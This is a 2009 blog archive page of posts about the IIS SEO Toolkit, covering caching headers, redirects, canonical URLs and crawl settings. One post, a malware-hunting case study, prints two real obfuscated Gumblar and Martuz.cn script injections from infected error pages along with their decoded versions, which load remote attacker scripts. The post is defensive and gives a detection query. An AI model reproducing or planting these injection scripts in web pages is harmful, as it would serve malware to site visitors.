June, 2009

Posts
  • CarlosAg Blog

    Are you caching your images and scripts? IIS SEO can tell you

    • 2 Comments

    One easy way to enhance the experience of users visiting your Web site by increasing the perceived performance of navigating in your site is to reduce the number of HTTP requests that are required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into a big image, etc, but by far the simplest one of all is making sure that you cache as much as you can in the client. This will not only increase the rendering time but will also reduce load in your server and will reduce your bandwidth consumption.

    Unfortunately the different types of caches and the different ways of set it can be quite confusing and esoteric. So my recommendation is to think about one way and use that all the time, and that way is using the HTTP 1.1 Cache-Control header.

    So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache them. You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if the headers are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

    Enter Site Analysis - IIS Search Optimization Toolkit

    To figure out if your images are sending the right headers you can follow the next steps:

    1. Install the IIS Search Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
    2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
    3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
      1. Is External - Equals - False -> To only include the files that are coming from your Web site.
      2. Status code - Equals - OK -> To include only successful requests
      3. Content Type Normalized - Begines With - image/ -> To include only images
      4. Headers - Not Contains - Cache-Control: -> to include the ones does not have the cache-control header specified
      5. Headers - Not Contains - Expires: -> To include only the ones that do no have the expires header
      6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

    Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="IsExternal" operator="Equals" value="False" />
        <
    expression field="StatusCode" operator="Equals" value="OK" />
        <
    expression field="ContentTypeNormalized" operator="Begins" value="image/" />
        <
    expression field="Headers" operator="NotContains" value="Cache-Control:" />
        <
    expression field="Headers" operator="NotContains" value="Expires:" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="ContentTypeNormalized" />
        <
    field name="StatusCode" />
      </
    displayFields>
    </query>

    How do I fix it?

    In IIS 7 this is trivial to fix, you can just drop a web.config file in the same directory where your images and scripts and CSS styles specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
     
    <system.webServer>
           
    <staticContent>
               
    <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
            </
    staticContent>
     
    </system.webServer>
    </configuration>

    You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers... or any of our API's using Managed code, JavaScript or your favorite language:

    http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

    Furthermore, using the same query above in the Query Builder you can Group by Directory and find the directories that really worth adding this. For that is just matter of clicking the "Group by" button and adding the URL-Directory to the Group by clauses. Not surprisingly in my case it flags the App_Themes directory where I store 8 images.

    IIS SEO

     

    Finally, what about 304's?

    One thing to note is that that even if you do not do anything most modern browsers will use conditional requests to reduce the latency if they have a copy in their cache, as an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in their cache, the browser will issue a request like this

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

    Note the use of If-Modfied-Since header which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't so the server responds with a status code 304 (Not Modified)

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

    Even though this helps you can imagine that this still requires a whole roundtrip to the server which even though will have a short response, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display correctly the page or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).

    Summary

    To summarize, with IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that otherwise were tedious tasks. In this case I show how easy it is to find all the images that are not specifying any caching headers and you can do the same thing for scripts (if you add Content Type Normalized equals application/javascript)  or styles (Content Type Normalized Equals text/css). This way you can increase the performance of the rendering and reduce the overall bandwidth of your Web site.

  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

    img01

    I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    img02

    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

    var a = "ScriptEngine", 
       
    b = "Version()+", 
       
    j = "", 
       
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
       
    zrvzts = "A"; 
       
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
       
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
    }

    And:

    var a="ScriptEngine",
       
    b="Version()+",
       
    j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
       
    zrvzts="A";
       
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

    Case Closed

    Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <
    expression field="FileContents" operator="Contains" value="unescape" />
        <
    expression field="FileContents" operator="Contains" value="eval" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="StatusCode" />
        <
    field name="Title" />
        <
    field name="Description" />
      </
    displayFields>
    </query>
  • CarlosAg Blog

    Announcing: IIS Search Engine Optimization Toolkit Beta 1

    • 20 Comments

    Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

    The features that are included in this Beta release include:

    • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed to help you easily troubleshoot common problems such as broken links, duplicate content, keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
    • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
    • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both physical and logical (Site Analysis crawler report) view of your Site.

    Checkout the great blog about IIS SEO Toolkit by ScottGu, or this IIS SEO simple video of some of its capabilities.

    Run it in your Development, Staging, or Production Environments

    One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish to the Web and you will not need to wait for those tools or Search Engines to crawl your site to finally discover you broke things.

    For developers this means that they can now easily look at the potential impact of removing or renaming a file, easily check which files are referring to this page and which files he can remove because of only being referenced by this page.

    Run it against any Web application built on any framework running in any server

    One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running in any platform, whether its ASP.NET, PHP, or plain HTML text files running in your local IIS or on any other remote server.

    Bottom line, try it against your Web site, look at the different features and give us feedback for additional reports, options, violations, content to parse, etc, post any comments or questions at the IIS Search Engine Optimization Forum.

    The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

    IIS Search Engine Optimization Toolkit

  • CarlosAg Blog

    Redirects, 301, 302 and IIS SEO Toolkit

    • 12 Comments

    In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily, Redirects are an important tool for Web sites and if used in the right context they actually are a required tool. But first a bit of background.

    What is a Redirect?

    A redirect in simple terms is a way for the server to indicate to a client (typically a browser) that a resource has moved and they do this by the use of an HTTP status code and a HTTP location header. There are different types of redirects but the most common ones used are:

    • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
    • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

    Below is an example on the response sent from the server when requesting http://www.microsoft.com/SQL/

    HTTP/1.1 302 Found
    Connection: Keep-Alive
    Content-Length: 161
    Content-Type: text/html; charset=utf-8
    Date: Wed, 10 Jun 2009 17:04:09 GMT
    Location: /sqlserver/2008/en/us/default.aspx
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET

     

    So what do redirects mean for SEO?

    One of the most important factors in SEO is the concept called organic linking, in simple words it means that your page gets extra points for every link that external Web sites have linking to your page. So now imagine the Search Engine Bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page) and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). Now the Search Engine has to decide if it should add the original "some-page" into its index as well as if it should "add the extra points" to the new location or to the original location, or if it should just ignore it entirely. Well the answer is not that simple, but a simplification of it could be:

    • if you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently so that all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), and that it should add all the "extra points" to it, as well as any further references to the original location should now be "treated" as if it was the new one.
    • if you return a 302 (Temporary Redirect) the answer can depend on search engines, but its likely to decide to index the original location and ignore the new location at all (unless directly linked in other places) since its only temporary and it could at any given point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous on how to deal with the "extra points" and likely will be added to the original location and not the new destination.

     

    Enter IIS SEO Toolkit

    IIS Search Optimization Toolkit has a couple of rules that look for different patterns related to Redirects. The Beta version includes the following:

    1. The redirection did not include a location header. Believe it or not there are a couple of applications out there that does not generate a location header which completely breaks the model of redirection. So if your application is one of them, it will let you know.
    2. The redirection response results in another redirection. In this case it detected that your page (A) is linking to another page (B) which caused a redirection to another page (C) which resulted in another redirection to yet another page (D). In this case it is trying to let you know that the number of redirects could significantly impact the SEO "bonus points" since the organic linking could be all broken by this jumping around and that you should consider just linking from (A) to (D) or whatever actual end page is supposed to be the final destination.
    3. The page contains unnecessary redirects. In this case it detected that your page (A) is linking to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as when tracking page impressions, or login pages, etc. but in many cases you do not need them since we detect that you own the three pages we are suggesting to look and see if it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
    4. The page uses a refresh definition instead of using redirection. Finally related to redirection, IIS SEO will flag when it detects that the use of the refresh meta-tag is being used as a mean for causing a redirection. This is a practice that is not recommended since the use of this tag does not include any semantics for search engines on how to process the content and in many cases is actually consider to be a tactic to confuse search engines, but I won't go there.

    So how does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

    IISSEORedirect1

    Notice that when you double click the violations it will tell you the details as well as give you direct access to the related URL's so that you can look at the content and all the relevant information about them to make the decision. From that menu you can also look at which other pages are linking to the different pages involved as well as launch it in the browser if needed.

    IISSEORedirect2

    Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

    IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way, just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP Status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 kb (Note that I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of spending in bandwidth). You can double click any of those rows and it will show you the details of the URL's that returned that and from there you can see who links to them, etc.

    IISSEORedirect3

    So what should I do?

    1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
    2. Try to minimize redirections. If possible with the knowledge gain on 1, make sure to look for places where you can update your content to reduce the number of redirects.
    3. Use the right redirect. Understand what is the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary). Whenever possible prefer Permanent Redirects 301.
    4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules using both regular expressions and wildcards that live along with your application (no-administrative privileges required) that can let you set the right redirection status code. A must for SEO. More on this on a future blog.

    Summary

    So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily, they are an important tool used by Web application for many reasons such as:

    • Canonicalization. Ensure that users are accessing your site with www. or without www. use permanent redirects
    • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
    • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
    • etc

    Just make sure you don't abuse them by having redirects to redirects, unnecessary redirects, infinite loops, and use the right semantics.

  • CarlosAg Blog

    Canonical Formats and Query Strings - IIS SEO Toolkit

    • 4 Comments

    Today somebody was running the IIS SEO Toolkit and using the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats.". The reason apparently is that he uses Query String parameters to pass contextual information or other information between pages. This of course yield the question: Does that mean in general query strings are bad news SEO wise?

    Well, the answer is not necessarily.

    I will start by clarifying that this violation in Site Analysis means that our algorithm detected that those two URL's look like the same content, note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

    1. Based on the fact they look like the same page Search Engines will probably choose one of them and index it as the real content and will discard the other one. The problem is that you are leaving this decision to Search Engines which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not-likely though). Or even worse they might end up indexing both of them as if they were different.
    2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that you would if this was not the case. Remember Search Engines add you "extra" points when somebody external references your page but now you'll be splitting the earnings with "two pages" instead of a single canonical form.

    Query String by themselves do not pose a terrible threat to SEO, most modern Search Engines deal OK with Query Strings, however its the organic linking and the potential abuse of Query Strings that could give you headaches.

    Remember, Search Engines should make no assumptions based on the fact it is a single "page" that serves tons of content through a single Absulte Path and the use of Query Strings. This is typical in many cases such as when using index.php, where pretty much every page on the site is served by the same resource and just using variations of Query Strings or path information.

     

    So what should I do?

    Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) to not index pages that have the different Query String variations that really are meant only for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and use the wildcard matching to specify to not follow any URL's that contain a '?'. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can use the Site Analysis feature to run it again and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?

     

    In summary, try to keep canonical formats yourself, don't leave any guesses to Search Engines cause some of them might get it wrong. There are new ways of specifying the canonical form in your markup but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though) using the new rel="canonical":

    <link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

    In the Beta 2 version of IIS SEO Toolkit we will support this tag and have better detection of this canonical issues. So stay tuned.

    Other ways to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the Query Strings and use more SEO friendly URL's.

  • CarlosAg Blog

    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests

    • 3 Comments

    The other day somebody ask me if there was a way to limit the amount of work that Site Analysis in IIS SEO Toolkit would cause to the server. This is interesting for a couple of reasons,

    • You might want to reduce the load that Site Analysis cause to your server at any given time
    • You might have a Denial-of-service detection system such as our Dynamic IP Restrictions IIS module that will start failing requests based on number of requests in a certain amount of time
    • Or If you like me have to go through a Proxy and it has a configured limit of number of requests per minute you are allowed to issue

    In Beta 1 we do not support the Crawl-delay directive in the Robots exclusion protocol; in future versions we will look at adding support this setting. The good news is that in Beta 1 we do have a configurable setting that can help you achieve this goals called Maximum Number of Concurrent Requests that you can configure.

    To set it:

    1. Go to the Site Analysis Reports page
    2. Select the option "Edit Feature Settings..." as show in the next image
      EditFeatureSettings
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
      MaxConcurrentRequests
Page 1 of 1 (6 items)